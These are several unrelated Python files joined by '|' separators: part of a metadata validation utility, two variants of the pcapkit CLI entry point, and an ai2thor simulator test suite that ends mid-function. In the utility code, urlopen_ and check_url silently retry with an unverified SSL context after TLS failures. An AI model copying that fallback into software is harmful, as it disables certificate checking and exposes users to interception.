    Return an etree friendly xpath, expanding namespace prefixes
    into namespace URIs
    :param xpath: xpath string with namespace prefixes
    :returns: etree friendly xpath
    """
    def _expand(chunk: str) -> str:
        # chunks without a prefix pass through untouched
        if ':' not in chunk:
            return chunk
        prefix, localname = chunk.split(':')
        return f'{{{NAMESPACES[prefix]}}}{localname}'
    return '/'.join(_expand(chunk) for chunk in xpath.split('/'))
def setup_logger(loglevel: str = None, logfile: str = None):
    """
    Setup logging
    :param loglevel: logging level name (e.g. 'DEBUG', 'INFO')
    :param logfile: logfile location
    :returns: void (configures the root logging instance)
    """
    if loglevel is None and logfile is None:  # logging not requested
        return
    if loglevel is None:  # a logfile alone implies INFO
        loglevel = 'INFO'
    named_levels = {
        'CRITICAL': logging.CRITICAL,
        'ERROR': logging.ERROR,
        'WARNING': logging.WARNING,
        'INFO': logging.INFO,
        'DEBUG': logging.DEBUG,
        'NOTSET': logging.NOTSET,
    }
    level = named_levels[loglevel]
    fmt = '[%(asctime)s] %(levelname)s - %(message)s'
    datefmt = '%Y-%m-%dT%H:%M:%SZ'
    if logfile is not None:  # the file sink wins over stdout
        logging.basicConfig(level=level, datefmt=datefmt,
                            format=fmt, filename=logfile)
    else:  # loglevel alone: log to stdout
        logging.basicConfig(level=level, datefmt=datefmt,
                            format=fmt, stream=sys.stdout)
    LOGGER.debug('Logging initialized')
def urlopen_(url: str):
    """
    Helper function for downloading a URL
    :param url: URL to download
    :returns: `http.client.HTTPResponse`
    """
    try:
        return urlopen(url)
    except (ssl.SSLError, URLError) as err:
        # TLS / URL failure: retry once without certificate verification
        LOGGER.warning(err)
        LOGGER.warning('Creating unverified context')
        unverified = ssl._create_unverified_context()
        return urlopen(url, context=unverified)
def check_url(url: str, check_ssl: bool, timeout: int = 30) -> dict:
    """
    Helper function to check link (URL) accessibility
    :param url: The URL to check
    :param check_ssl: Whether the SSL/TLS layer verification shall be made
    :param timeout: timeout, in seconds (default: 30)
    :returns: `dict` with details about the link
    """
    response = None
    result = {
        'mime-type': None,
        'url-original': url
    }
    try:
        if check_ssl is False:
            LOGGER.debug('Creating unverified context')
            result['ssl'] = False
            context = ssl._create_unverified_context()
            response = urlopen(url, context=context, timeout=timeout)
        else:
            response = urlopen(url, timeout=timeout)
    except TimeoutError as err:
        LOGGER.debug(f'Timeout error: {err}')
    except (ssl.SSLError, URLError, ValueError) as err:
        LOGGER.debug(f'SSL/URL error: {err}')
    except Exception as err:
        LOGGER.debug(f'Other error: {err}')
    if response is None and check_ssl is True:
        # retry without certificate verification, keeping the caller's
        # timeout (it was previously reset to the default on this path)
        return check_url(url, False, timeout)
    if response is not None:
        result['url-resolved'] = response.url
        parsed_uri = urlparse(response.url)
        if parsed_uri.scheme in ('http', 'https'):
            if response.status > 300:
                LOGGER.debug(f'Request failed: {response}')
            result['accessible'] = response.status < 300
            result['mime-type'] = response.headers.get_content_type()
        else:
            result['accessible'] = True
        # compare the scheme with ==; `scheme in ('https')` was a substring
        # test against the *string* 'https', which also matched 'http'
        if parsed_uri.scheme == 'https' and check_ssl is True:
            result['ssl'] = True
    else:
        result['accessible'] = False
    return result
def validate_iso_xml(xml):
    """
    Perform XML Schema validation of ISO XML Metadata
    :param xml: file / file-like object or string of XML
    :returns: `None` on success; raises `IOError` if the schema directory
              is missing and a validation error (via `assertValid`) if the
              document does not conform to the schema
    """
    userdir = get_userdir()
    if not os.path.exists(userdir):
        raise IOError(f'{userdir} does not exist')
    if isinstance(xml, str):
        # accept raw XML text in addition to already-parsed input
        xml = etree.fromstring(xml)
    xsd = os.path.join(userdir, 'iso-all.xsd')
    LOGGER.debug(f'Validating {xml} against schema {xsd}')
    schema = etree.XMLSchema(etree.parse(xsd))
    schema.assertValid(xml)
def parse_wcmp(content):
    """
    Parse a buffer into an etree ElementTree
    :param content: str of xml content (anything accepted by `etree.parse`)
    :returns: `lxml.etree._ElementTree` object of WCMP
    :raises RuntimeError: if the content is not well-formed XML or the root
                          element is not an ISO 19139 `MD_Metadata`
    """
    try:
        exml = etree.parse(content)
    except etree.XMLSyntaxError as err:
        LOGGER.error(err)
        # chain the lxml error so the root cause is preserved in tracebacks
        raise RuntimeError('Syntax error') from err
    root_tag = exml.getroot().tag
    if root_tag != '{http://www.isotc211.org/2005/gmd}MD_Metadata':
        raise RuntimeError('Does not look like a WCMP document!')
    return exml
|
# -*- coding: utf-8 -*-
"""command line tool
:mod:`pcapkit.__main__` was originally the module file of
|jspcapy|_, which is now deprecated and merged with :mod:`pcapkit`.
"""
import argparse
import sys
import warnings
import emoji
from pcapkit.foundation.extraction import Extractor
from pcapkit.interface import JSON, PLIST, TREE
#: version number
__version__ = '0.15.5'
def get_parser():
    """CLI argument parser.
    Returns:
        argparse.ArgumentParser: Argument parser.
    """
    parser = argparse.ArgumentParser(prog='pcapkit-cli',
                                     description='PCAP file extractor and formatted dumper')
    parser.add_argument('-V', '--version', action='version', version=__version__)
    parser.add_argument('fin', metavar='input-file-name',
                        help=('The name of input pcap file. If ".pcap" omits, '
                              'it will be automatically appended.'))
    # NOTE: help text previously said "input pcap file" (copy-paste from `fin`)
    parser.add_argument('-o', '--output', action='store', metavar='file-name', dest='fout',
                        help=('The name of output file. If format extension '
                              'omits, it will be automatically appended.'))
    parser.add_argument('-f', '--format', action='store', metavar='format', dest='format',
                        help=('Print an extraction report in the specified output '
                              'format. Available are all formats supported by '
                              'dictdumper, e.g.: json, plist, and tree.'))
    parser.add_argument('-j', '--json', action='store_true', default=False,
                        help=('Display extraction report as json. This will yield '
                              '"raw" output that may be used by external tools. '
                              'This option overrides all other options.'))
    parser.add_argument('-p', '--plist', action='store_true', default=False,
                        help=('Display extraction report as macOS Property List '
                              '(plist). This will yield "raw" output that may be '
                              'used by external tools. This option overrides all '
                              'other options.'))
    parser.add_argument('-t', '--tree', action='store_true', default=False,
                        help=('Display extraction report as tree view text. This '
                              'will yield "raw" output that may be used by external '
                              'tools. This option overrides all other options.'))
    parser.add_argument('-a', '--auto-extension', action='store_true', default=False,
                        help='If output file extension omits, append automatically.')
    parser.add_argument('-v', '--verbose', action='store_false', default=True,
                        help='Show more information.')
    parser.add_argument('-F', '--files', action='store_true', default=False,
                        help='Split each frame into different files.')
    parser.add_argument('-E', '--engine', action='store', dest='engine', default='default', metavar='PKG',
                        help=('Indicate extraction engine. Note that except '
                              'default or pcapkit engine, all other engines '
                              'need support of corresponding packages.'))
    parser.add_argument('-P', '--protocol', action='store', dest='protocol', default='null', metavar='PROTOCOL',
                        help='Indicate extraction stops after which protocol.')
    parser.add_argument('-L', '--layer', action='store', dest='layer', default='None', metavar='LAYER',
                        help='Indicate extract frames until which layer.')
    return parser
def main():
    """Entrypoint: parse CLI arguments, run the extraction and report output."""
    parser = get_parser()
    args = parser.parse_args()
    warnings.simplefilter('ignore')
    # an explicit --format wins; the -j/-p/-t shortcuts follow in that order
    if args.format:
        fmt = args.format
    elif args.json:
        fmt = JSON
    elif args.plist:
        fmt = PLIST
    elif args.tree:
        fmt = TREE
    else:
        fmt = None
    extractor = Extractor(store=False, format=fmt,
                          fin=args.fin, fout=args.fout,
                          auto=args.verbose, files=args.files,
                          layer=args.layer, protocol=args.protocol,
                          engine=args.engine, extension=args.auto_extension)
    if not args.verbose:
        # interactive mode: report progress frame by frame
        try:
            print(emoji.emojize(f":police_car_light: Loading file {extractor.input!r}"))
        except UnicodeEncodeError:
            print(f"[*] Loading file {extractor.input!r}")
        for _ in extractor:
            print(f' - Frame {extractor.length:>3d}: {extractor.protocol}')
        # NOTE: the inner quotes must differ from the f-string's own quotes;
        # reusing double quotes is a SyntaxError before Python 3.12 (PEP 701)
        try:
            print(emoji.emojize(f":beer_mug: Report file{'s' if args.files else ''} stored in {extractor.output!r}"))
        except UnicodeEncodeError:
            print(f"[*] Report file{'s' if args.files else ''} stored in {extractor.output!r}")
if __name__ == '__main__':
    sys.exit(main())
| # -*- coding: utf-8 -*-
"""command line tool
:mod:`pcapkit.__main__` was originally the module file of
|jspcapy|_, which is now deprecated and merged with :mod:`pcapkit`.
"""
import argparse
import sys
import warnings
import emoji
from pcapkit.foundation.extraction import Extractor
from pcapkit.interface import JSON, PLIST, TREE
#: version number
__version__ = '0.15.5'
def get_parser():
    """CLI argument parser.
    Returns:
        argparse.ArgumentParser: Argument parser.
    """
    parser = argparse.ArgumentParser(prog='pcapkit-cli',
                                     description='PCAP file extractor and formatted dumper')
    parser.add_argument('-V', '--version', action='version', version=__version__)
    parser.add_argument('fin', metavar='input-file-name',
                        help=('The name of input pcap file. If ".pcap" omits, '
                              'it will be automatically appended.'))
    # NOTE: help text previously said "input pcap file" (copy-paste from `fin`)
    parser.add_argument('-o', '--output', action='store', metavar='file-name', dest='fout',
                        help=('The name of output file. If format extension '
                              'omits, it will be automatically appended.'))
    parser.add_argument('-f', '--format', action='store', metavar='format', dest='format',
                        help=('Print an extraction report in the specified output '
                              'format. Available are all formats supported by '
                              'dictdumper, e.g.: json, plist, and tree.'))
    parser.add_argument('-j', '--json', action='store_true', default=False,
                        help=('Display extraction report as json. This will yield '
                              '"raw" output that may be used by external tools. '
                              'This option overrides all other options.'))
    parser.add_argument('-p', '--plist', action='store_true', default=False,
                        help=('Display extraction report as macOS Property List '
                              '(plist). This will yield "raw" output that may be '
                              'used by external tools. This option overrides all '
                              'other options.'))
    parser.add_argument('-t', '--tree', action='store_true', default=False,
                        help=('Display extraction report as tree view text. This '
                              'will yield "raw" output that may be used by external '
                              'tools. This option overrides all other options.'))
    parser.add_argument('-a', '--auto-extension', action='store_true', default=False,
                        help='If output file extension omits, append automatically.')
    parser.add_argument('-v', '--verbose', action='store_false', default=True,
                        help='Show more information.')
    parser.add_argument('-F', '--files', action='store_true', default=False,
                        help='Split each frame into different files.')
    parser.add_argument('-E', '--engine', action='store', dest='engine', default='default', metavar='PKG',
                        help=('Indicate extraction engine. Note that except '
                              'default or pcapkit engine, all other engines '
                              'need support of corresponding packages.'))
    parser.add_argument('-P', '--protocol', action='store', dest='protocol', default='null', metavar='PROTOCOL',
                        help='Indicate extraction stops after which protocol.')
    parser.add_argument('-L', '--layer', action='store', dest='layer', default='None', metavar='LAYER',
                        help='Indicate extract frames until which layer.')
    return parser
def main():
    """Entrypoint: parse CLI arguments, run the extraction and report output."""
    args = get_parser().parse_args()
    warnings.simplefilter('ignore')
    # an explicit --format beats the -j/-p/-t shortcuts, in that order
    fmt = None
    for selected, candidate in ((args.format, args.format),
                                (args.json, JSON),
                                (args.plist, PLIST),
                                (args.tree, TREE)):
        if selected:
            fmt = candidate
            break
    extractor = Extractor(store=False, format=fmt,
                          fin=args.fin, fout=args.fout,
                          auto=args.verbose, files=args.files,
                          layer=args.layer, protocol=args.protocol,
                          engine=args.engine, extension=args.auto_extension)
    if not args.verbose:
        try:
            print(emoji.emojize(f":police_car_light: Loading file {extractor.input!r}"))
        except UnicodeEncodeError:
            print(f"[*] Loading file {extractor.input!r}")
        for _ in extractor:
            print(f' - Frame {extractor.length:>3d}: {extractor.protocol}')
        suffix = 's' if args.files else ''
        try:
            print(emoji.emojize(f":beer_mug: Report file{suffix} stored in {extractor.output!r}"))
        except UnicodeEncodeError:
            print(f"[*] Report file{suffix} stored in {extractor.output!r}")
if __name__ == '__main__':
    sys.exit(main())
|
# import pytest
import os
import string
import random
import copy
import json
import pytest
import warnings
import jsonschema
import numpy as np
from ai2thor.controller import Controller
from ai2thor.tests.constants import TESTS_DATA_DIR
from ai2thor.wsgi_server import WsgiServer
from ai2thor.fifo_server import FifoServer
from PIL import ImageChops, ImageFilter, Image
import glob
import re
TEST_SCENE = "FloorPlan28"
# Defining const classes to lessen the possibility of a misspelled key
class Actions:
    """Action-name constants passed to ``controller.step`` (avoids typo'd strings)."""
    AddThirdPartyCamera = "AddThirdPartyCamera"
    UpdateThirdPartyCamera = "UpdateThirdPartyCamera"
class MultiAgentMetadata:
    """Metadata-dict key constants for multi-agent events."""
    thirdPartyCameras = "thirdPartyCameras"
class ThirdPartyCameraMetadata:
    """Key constants for entries of the ``thirdPartyCameras`` metadata list."""
    position = "position"
    rotation = "rotation"
    fieldOfView = "fieldOfView"
def build_controller(**args):
    """Create a Controller on TEST_SCENE (local build), letting **args override defaults."""
    merged = {"scene": TEST_SCENE, "local_build": True, **args}
    # during a ci-build we will get a warning that we are using a commit_id
    # for the build instead of 'local' -- silence it
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        controller = Controller(**merged)
    # remember the pristine parameters so tests can reset back to them later
    controller._original_initialization_parameters = controller.initialization_parameters
    return controller
# module-level controllers shared (and reset) across all tests in this file
_wsgi_controller = build_controller(server_class=WsgiServer)
_fifo_controller = build_controller(server_class=FifoServer)
_stochastic_controller = build_controller(agentControllerType="stochastic")
def skip_reset(controller):
    """Mark the controller so the next reset_controller() call skips the scene reset."""
    # setting attribute on the last event so we can tell if the
    # controller gets used since last event will change after each step
    controller.last_event._pytest_skip_reset = True
# resetting on each use so that each tests works with
# the scene in a pristine state
def reset_controller(controller):
    """Restore pristine init parameters and reset the scene unless marked to skip."""
    pristine = copy.deepcopy(controller._original_initialization_parameters)
    controller.initialization_parameters = pristine
    # skip_reset() stamps last_event; an unstamped event means the
    # controller was used since the last reset
    if not hasattr(controller.last_event, "_pytest_skip_reset"):
        controller.reset(TEST_SCENE)
        skip_reset(controller)
    return controller
@pytest.fixture
def wsgi_controller():
    """Shared WSGI-server controller, reset to a pristine TEST_SCENE."""
    return reset_controller(_wsgi_controller)
@pytest.fixture
def stochastic_controller():
    """Shared stochastic-agent controller, reset to a pristine TEST_SCENE."""
    return reset_controller(_stochastic_controller)
@pytest.fixture
def fifo_controller():
    """Shared FIFO-server controller, reset to a pristine TEST_SCENE."""
    return reset_controller(_fifo_controller)
# controller pools used by @pytest.mark.parametrize below
fifo_wsgi = [_fifo_controller, _wsgi_controller]
fifo_wsgi_stoch = [_fifo_controller, _wsgi_controller, _stochastic_controller]
# a known-good agent pose in FloorPlan28 used as a teleport target
BASE_FP28_POSITION = dict(x=-1.5, z=-1.5, y=0.901,)
BASE_FP28_LOCATION = dict(
    **BASE_FP28_POSITION, rotation={"x": 0, "y": 0, "z": 0}, horizon=0, standing=True,
)
def teleport_to_base_location(controller: Controller):
    """Teleport the agent to the canonical FloorPlan28 pose, asserting success."""
    scene = controller.last_event.metadata["sceneName"].replace("_physics", "")
    assert scene == TEST_SCENE
    controller.step("TeleportFull", **BASE_FP28_LOCATION)
    assert controller.last_event.metadata["lastActionSuccess"]
def setup_function(function):
    """pytest hook: reset every shared controller before each test runs."""
    for c in [_fifo_controller, _wsgi_controller, _stochastic_controller]:
        reset_controller(c)
def teardown_module(module):
    """pytest hook: stop all shared controllers when the module finishes."""
    _wsgi_controller.stop()
    _fifo_controller.stop()
    _stochastic_controller.stop()
def assert_near(point1, point2, error_message=""):
    """Assert two coordinate dicts share exactly the same keys and agree
    component-wise within 1e-3."""
    assert point1.keys() == point2.keys(), error_message + "Keys mismatch."
    for key, value in point1.items():
        delta = abs(value - point2[key])
        assert delta < 1e-3, (
            error_message + f"for {key} key, {value} != {point2[key]}"
        )
def test_stochastic_controller(stochastic_controller):
    """Smoke test: a stochastic-agent controller can reset the test scene."""
    stochastic_controller.reset(TEST_SCENE)
    assert stochastic_controller.last_event.metadata["lastActionSuccess"]
# Issue #514 found that the thirdPartyCamera image code was causing multi-agents to end
# up with the same frame
def test_multi_agent_with_third_party_camera(fifo_controller):
    """Regression (#514): agents keep distinct frames after adding a third-party camera."""
    fifo_controller.reset(TEST_SCENE, agentCount=2)
    assert not np.all(
        fifo_controller.last_event.events[1].frame
        == fifo_controller.last_event.events[0].frame
    )
    event = fifo_controller.step(
        dict(
            action="AddThirdPartyCamera",
            rotation=dict(x=0, y=0, z=90),
            position=dict(x=-1.0, z=-2.0, y=1.0),
        )
    )
    assert not np.all(
        fifo_controller.last_event.events[1].frame
        == fifo_controller.last_event.events[0].frame
    )
# Issue #526 thirdPartyCamera hanging without correct keys in FifoServer FormMap
def test_third_party_camera_with_image_synthesis(fifo_controller):
    """Regression (#526): third-party cameras render all image-synthesis frame types."""
    fifo_controller.reset(
        TEST_SCENE,
        renderInstanceSegmentation=True,
        renderDepthImage=True,
        renderSemanticSegmentation=True,
    )
    event = fifo_controller.step(
        dict(
            action="AddThirdPartyCamera",
            rotation=dict(x=0, y=0, z=90),
            position=dict(x=-1.0, z=-2.0, y=1.0),
        )
    )
    assert len(event.third_party_depth_frames) == 1
    assert len(event.third_party_semantic_segmentation_frames) == 1
    assert len(event.third_party_camera_frames) == 1
    assert len(event.third_party_instance_segmentation_frames) == 1
def test_rectangle_aspect(fifo_controller):
    """A non-square (wide) resolution produces a frame of matching shape."""
    fifo_controller.reset(TEST_SCENE, width=600, height=300)
    event = fifo_controller.step(dict(action="Initialize", gridSize=0.25))
    assert event.frame.shape == (300, 600, 3)
def test_small_aspect(fifo_controller):
    """A small non-square resolution produces a frame of matching shape."""
    fifo_controller.reset(TEST_SCENE, width=128, height=64)
    event = fifo_controller.step(dict(action="Initialize", gridSize=0.25))
    assert event.frame.shape == (64, 128, 3)
def test_bot_deprecation(fifo_controller):
    """The deprecated agentMode='bot' is aliased to 'locobot'."""
    fifo_controller.reset(TEST_SCENE, agentMode="bot")
    assert (
        fifo_controller.initialization_parameters["agentMode"].lower() == "locobot"
    ), "bot should alias to locobot!"
def test_deprecated_segmentation_params(fifo_controller):
    """Deprecated render flags still populate the renamed segmentation frames."""
    # renderObjectImage has been renamed to renderInstanceSegmentation
    # renderClassImage has been renamed to renderSemanticSegmentation
    fifo_controller.reset(
        TEST_SCENE, renderObjectImage=True, renderClassImage=True,
    )
    event = fifo_controller.last_event
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", category=DeprecationWarning)
        assert event.class_segmentation_frame is event.semantic_segmentation_frame
        assert event.semantic_segmentation_frame is not None
        assert (
            event.instance_segmentation_frame is not None
        ), "renderObjectImage should still render instance_segmentation_frame"
def test_deprecated_segmentation_params2(fifo_controller):
    """The renamed render flags expose the old (deprecated) frame aliases too."""
    # renderObjectImage has been renamed to renderInstanceSegmentation
    # renderClassImage has been renamed to renderSemanticSegmentation
    fifo_controller.reset(
        TEST_SCENE, renderSemanticSegmentation=True, renderInstanceSegmentation=True,
    )
    event = fifo_controller.last_event
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", category=DeprecationWarning)
        assert event.class_segmentation_frame is event.semantic_segmentation_frame
        assert event.semantic_segmentation_frame is not None
        assert (
            event.instance_segmentation_frame is not None
        ), "renderObjectImage should still render instance_segmentation_frame"
def test_reset(fifo_controller):
    """reset() honors new width/height and toggles depth rendering on and off."""
    width = 520
    height = 310
    event = fifo_controller.reset(
        scene=TEST_SCENE, width=width, height=height, renderDepthImage=True
    )
    assert event.frame.shape == (height, width, 3), "RGB frame dimensions are wrong!"
    assert event.depth_frame is not None, "depth frame should have rendered!"
    assert event.depth_frame.shape == (
        height,
        width,
    ), "depth frame dimensions are wrong!"
    width = 300
    height = 300
    event = fifo_controller.reset(
        scene=TEST_SCENE, width=width, height=height, renderDepthImage=False
    )
    assert event.depth_frame is None, "depth frame shouldn't have rendered!"
    assert event.frame.shape == (height, width, 3), "RGB frame dimensions are wrong!"
def test_fast_emit(fifo_controller):
    """Fast-emit actions reuse the previous raw metadata objects; normal actions don't."""
    event = fifo_controller.step(dict(action="RotateRight"))
    event_fast_emit = fifo_controller.step(dict(action="TestFastEmit", rvalue="foo"))
    event_no_fast_emit = fifo_controller.step(dict(action="LookUp"))
    event_no_fast_emit_2 = fifo_controller.step(dict(action="RotateRight"))
    assert event.metadata._raw_metadata["actionReturn"] is None
    assert event_fast_emit.metadata._raw_metadata["actionReturn"] == "foo"
    # identity (not equality) checks: fast emit shares the same objects list
    assert id(event.metadata._raw_metadata["objects"]) == id(
        event_fast_emit.metadata._raw_metadata["objects"]
    )
    assert id(event.metadata._raw_metadata["objects"]) != id(
        event_no_fast_emit.metadata._raw_metadata["objects"]
    )
    assert id(event_no_fast_emit_2.metadata._raw_metadata["objects"]) != id(
        event_no_fast_emit.metadata._raw_metadata["objects"]
    )
def test_fifo_large_input(fifo_controller):
    """A 16 KiB payload round-trips intact through the FIFO server."""
    random_string = "".join(
        random.choice(string.ascii_letters) for i in range(1024 * 16)
    )
    event = fifo_controller.step(
        dict(action="TestActionReflectParam", rvalue=random_string)
    )
    assert event.metadata["actionReturn"] == random_string
def test_fast_emit_disabled(fifo_controller):
    """With fastActionEmit=False, metadata objects are NOT shared between events."""
    slow_controller = fifo_controller
    slow_controller.reset(TEST_SCENE, fastActionEmit=False)
    event = slow_controller.step(dict(action="RotateRight"))
    event_fast_emit = slow_controller.step(dict(action="TestFastEmit", rvalue="foo"))
    # assert that when actionFastEmit is off that the objects are different
    assert id(event.metadata["objects"]) != id(event_fast_emit.metadata["objects"])
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_lookdown(controller):
    """LookDown lowers the camera in 30-degree steps and clamps at 60."""
    e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    position = controller.last_event.metadata["agent"]["position"]
    horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
    assert horizon == 0.0
    e = controller.step(dict(action="LookDown"))
    assert e.metadata["agent"]["position"] == position
    assert round(e.metadata["agent"]["cameraHorizon"]) == 30
    assert e.metadata["agent"]["rotation"] == dict(x=0, y=0, z=0)
    e = controller.step(dict(action="LookDown"))
    assert round(e.metadata["agent"]["cameraHorizon"]) == 60
    # a third LookDown is a no-op: horizon stays clamped at 60
    e = controller.step(dict(action="LookDown"))
    assert round(e.metadata["agent"]["cameraHorizon"]) == 60
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_no_leak_params(controller):
    """step() must not mutate the caller's action dict (e.g. inject sequenceId)."""
    action = dict(action="RotateLook", rotation=0, horizon=0)
    e = controller.step(action)
    assert "sequenceId" not in action
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_target_invocation_exception(controller):
    """Invalid Unity-side arguments fail gracefully with an error message."""
    # TargetInvocationException is raised when short circuiting failures occur
    # on the Unity side. It often occurs when invalid arguments are used.
    event = controller.step("OpenObject", x=1.5, y=0.5)
    assert not event.metadata["lastActionSuccess"], "OpenObject(x > 1) should fail."
    assert event.metadata[
        "errorMessage"
    ], "errorMessage should not be empty when OpenObject(x > 1)."
@pytest.mark.parametrize("controller", fifo_wsgi_stoch)
def test_lookup(controller):
    """LookUp raises the camera by 30 degrees and clamps at -30."""
    e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    position = controller.last_event.metadata["agent"]["position"]
    horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
    assert horizon == 0.0
    e = controller.step(dict(action="LookUp"))
    assert e.metadata["agent"]["position"] == position
    assert e.metadata["agent"]["cameraHorizon"] == -30.0
    assert e.metadata["agent"]["rotation"] == dict(x=0, y=0, z=0)
    # a second LookUp is a no-op: horizon stays clamped at -30
    e = controller.step(dict(action="LookUp"))
    assert e.metadata["agent"]["cameraHorizon"] == -30.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_left(controller):
    """RotateLeft turns the agent 90 degrees (0 -> 270) without moving it."""
    e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    position = controller.last_event.metadata["agent"]["position"]
    rotation = controller.last_event.metadata["agent"]["rotation"]
    assert rotation == dict(x=0, y=0, z=0)
    horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
    e = controller.step(dict(action="RotateLeft"))
    assert e.metadata["agent"]["position"] == position
    assert e.metadata["agent"]["cameraHorizon"] == horizon
    assert e.metadata["agent"]["rotation"]["y"] == 270.0
    assert e.metadata["agent"]["rotation"]["x"] == 0.0
    assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_simobj_filter(controller):
    """SetObjectFilter limits metadata objects; ResetObjectFilter restores them all."""
    objects = controller.last_event.metadata["objects"]
    unfiltered_object_ids = sorted([o["objectId"] for o in objects])
    filter_object_ids = sorted([o["objectId"] for o in objects[0:3]])
    e = controller.step(dict(action="SetObjectFilter", objectIds=filter_object_ids))
    assert len(e.metadata["objects"]) == len(filter_object_ids)
    filtered_object_ids = sorted([o["objectId"] for o in e.metadata["objects"]])
    assert filtered_object_ids == filter_object_ids
    # an empty filter hides every object
    e = controller.step(dict(action="SetObjectFilter", objectIds=[]))
    assert len(e.metadata["objects"]) == 0
    e = controller.step(dict(action="ResetObjectFilter"))
    reset_filtered_object_ids = sorted([o["objectId"] for o in e.metadata["objects"]])
    assert unfiltered_object_ids == reset_filtered_object_ids
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_add_third_party_camera(controller):
    """AddThirdPartyCamera stores pose/FOV and rejects malformed arguments."""
    expectedPosition = dict(x=1.2, y=2.3, z=3.4)
    expectedRotation = dict(x=30, y=40, z=50)
    expectedFieldOfView = 45.0
    assert (
        len(controller.last_event.metadata[MultiAgentMetadata.thirdPartyCameras]) == 0
    ), "there should be 0 cameras"
    e = controller.step(
        dict(
            action=Actions.AddThirdPartyCamera,
            position=expectedPosition,
            rotation=expectedRotation,
            fieldOfView=expectedFieldOfView,
        )
    )
    assert (
        len(e.metadata[MultiAgentMetadata.thirdPartyCameras]) == 1
    ), "there should be 1 camera"
    camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
    assert_near(
        camera[ThirdPartyCameraMetadata.position],
        expectedPosition,
        "initial position should have been set",
    )
    assert_near(
        camera[ThirdPartyCameraMetadata.rotation],
        expectedRotation,
        "initial rotation should have been set",
    )
    assert (
        camera[ThirdPartyCameraMetadata.fieldOfView] == expectedFieldOfView
    ), "initial fieldOfView should have been set"
    # expects position to be a Vector3, should fail!
    event = controller.step(
        action="AddThirdPartyCamera", position=5, rotation=dict(x=0, y=0, z=0)
    )
    assert not event.metadata[
        "lastActionSuccess"
    ], "position should not allow float input!"
    # orthographicSize expects float, not Vector3!
    error_message = None
    try:
        event = controller.step(
            action="AddThirdPartyCamera",
            position=dict(x=0, y=0, z=0),
            rotation=dict(x=0, y=0, z=0),
            orthographic=True,
            orthographicSize=dict(x=0, y=0, z=0),
        )
    except ValueError as e:
        error_message = str(e)
    assert error_message.startswith(
        "action: AddThirdPartyCamera has an invalid argument: orthographicSize"
    )
def test_update_third_party_camera(fifo_controller):
    """UpdateThirdPartyCamera supports full and partial pose updates and
    rejects out-of-range fieldOfView values."""
    # add a new camera
    expectedPosition = dict(x=1.2, y=2.3, z=3.4)
    expectedRotation = dict(x=30, y=40, z=50)
    expectedFieldOfView = 45.0
    e = fifo_controller.step(
        dict(
            action=Actions.AddThirdPartyCamera,
            position=expectedPosition,
            rotation=expectedRotation,
            fieldOfView=expectedFieldOfView,
        )
    )
    assert (
        len(fifo_controller.last_event.metadata[MultiAgentMetadata.thirdPartyCameras])
        == 1
    ), "there should be 1 camera"
    # update camera pose fully
    expectedPosition = dict(x=2.2, y=3.3, z=4.4)
    expectedRotation = dict(x=10, y=20, z=30)
    expectedInitialFieldOfView = 45.0
    e = fifo_controller.step(
        dict(
            action=Actions.UpdateThirdPartyCamera,
            thirdPartyCameraId=0,
            position=expectedPosition,
            rotation=expectedRotation,
        )
    )
    camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
    assert_near(
        camera[ThirdPartyCameraMetadata.position],
        expectedPosition,
        "position should have been updated",
    )
    assert_near(
        camera[ThirdPartyCameraMetadata.rotation],
        expectedRotation,
        "rotation should have been updated",
    )
    assert (
        camera[ThirdPartyCameraMetadata.fieldOfView] == expectedInitialFieldOfView
    ), "fieldOfView should not have changed"
    # partially update the camera pose
    changeFOV = 55.0
    expectedPosition2 = dict(x=3.2, z=5)
    expectedRotation2 = dict(y=90)
    e = fifo_controller.step(
        action=Actions.UpdateThirdPartyCamera,
        thirdPartyCameraId=0,
        fieldOfView=changeFOV,
        position=expectedPosition2,
        rotation=expectedRotation2,
    )
    camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
    assert (
        camera[ThirdPartyCameraMetadata.fieldOfView] == changeFOV
    ), "fieldOfView should have been updated"
    # merge the partial updates into the expected pose before comparing
    expectedPosition.update(expectedPosition2)
    expectedRotation.update(expectedRotation2)
    assert_near(
        camera[ThirdPartyCameraMetadata.position],
        expectedPosition,
        "position should been slightly updated",
    )
    assert_near(
        camera[ThirdPartyCameraMetadata.rotation],
        expectedRotation,
        "rotation should been slightly updated",
    )
    for fov in [-1, 181, 0]:
        e = fifo_controller.step(
            dict(
                action=Actions.UpdateThirdPartyCamera,
                thirdPartyCameraId=0,
                fieldOfView=fov,
            )
        )
        assert not e.metadata[
            "lastActionSuccess"
        ], "fieldOfView should fail outside of (0, 180)"
        assert_near(
            camera[ThirdPartyCameraMetadata.position],
            expectedPosition,
            "position should not have updated",
        )
        assert_near(
            camera[ThirdPartyCameraMetadata.rotation],
            expectedRotation,
            "rotation should not have updated",
        )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_look(controller):
    """RotateLook sets rotation and horizon together without moving the agent."""
    e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    position = controller.last_event.metadata["agent"]["position"]
    rotation = controller.last_event.metadata["agent"]["rotation"]
    assert rotation == dict(x=0, y=0, z=0)
    e = controller.step(dict(action="RotateLook", rotation=90, horizon=31))
    assert e.metadata["agent"]["position"] == position
    assert int(e.metadata["agent"]["cameraHorizon"]) == 31
    assert e.metadata["agent"]["rotation"]["y"] == 90.0
    assert e.metadata["agent"]["rotation"]["x"] == 0.0
    assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_right(controller):
    """RotateRight turns the agent 90 degrees (0 -> 90) without moving it."""
